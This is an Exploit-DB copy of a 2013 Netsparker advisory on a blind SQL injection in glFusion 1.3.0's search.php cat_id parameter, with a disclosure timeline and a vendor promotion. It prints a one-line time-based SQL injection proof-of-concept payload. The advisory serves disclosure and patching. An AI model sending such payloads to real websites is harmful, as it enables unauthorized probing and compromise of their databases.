glFusion 1.3.0 search.php cat_id param - SQL Injection

ID EDB-ID:28185
Type exploitdb
Reporter Omar Kurt
Modified 2013-09-10T00:00:00


glFusion 1.3.0 (search.php cat_id param) - SQL Injection. Webapps exploit for php platform

Name :  SQL Injection Vulnerability in glFusion
Software :  glFusion 1.3.0 and possibly below.
Vendor Homepage :
Vulnerability Type :  Blind SQL Injection
Severity :  Critical
Researcher :  Omar Kurt
Advisory Reference :  NS-13-009

A dynamic system based on flexible and granular permissions, with spam
protection, forums, file management, media gallery, calendars, polls,
site-wide search, RSS feeds, and more!

glFusion is affected by SQL Injection vulnerability in version 1.3.0.
Example PoC url is as follows:
Blind SQL Injection Vulnerability
POST - param:
cat_id='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'

You can read the full article about SQL Injection vulnerabilities from here


Advisory Timeline
05/09/2013 - First contact: No response
05/09/2013 - Vendor replied
05/09/2013 - Shared details
06/09/2013 - Fix released
09/09/2013 - Advisory Released

It has been discovered on testing of Netsparker, Web Application Security
Scanner -

MSL Advisory Link :
Netsparker Advisories :

About Netsparker
NetsparkerÂŽ can find and report security issues such as SQL Injection and
Cross-site Scripting (XSS) in all web applications regardless of the
platform and the technology they are built on. Netsparker's unique
detection and exploitation techniques allows it to be dead accurate in
reporting hence it's the first and the only False Positive Free web
application security scanner.
Netsparker Advisories, <>